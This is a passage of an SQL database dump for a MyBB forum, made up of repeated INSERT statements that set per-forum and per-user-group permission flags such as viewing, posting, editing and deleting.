`canvotepolls`, `cansearch`) VALUES ('471', '45', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('822', '64', '17', '0', '0', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('511', '61', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('538', '29', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('539', '39', '18', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('540', '30', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('541', '31', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('542', '44', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('543', '45', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('693', '48', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('706', '50', '18', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('546', '54', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('547', '60', '18', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('548', '61', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('549', '62', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('646', '64', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('551', '66', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('552', '78', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('553', '78', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('554', '78', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('555', '78', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('556', '78', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('557', '78', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('558', '78', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('559', '78', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('560', '78', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('561', '78', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('562', '78', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('563', '78', '18', '1', '1', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '1', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('564', '79', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('565', '79', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('566', '79', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('567', '79', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('568', '79', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('569', '79', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('570', '79', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('571', '79', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('572', '79', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('573', '79', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('574', '80', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('575', '80', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('576', '80', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('577', '80', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('578', '80', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('579', '80', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('580', '80', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('581', '80', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('582', '80', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('583', '80', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('708', '81', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('709', '81', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('710', '81', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('711', '81', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('712', '81', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('713', '81', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('714', '81', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('715', '81', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('716', '81', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('717', '81', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('718', '81', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('719', '81', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('608', '5', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('621', '48', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('636', '19', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('647', '64', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('648', '5', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('649', '2', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, 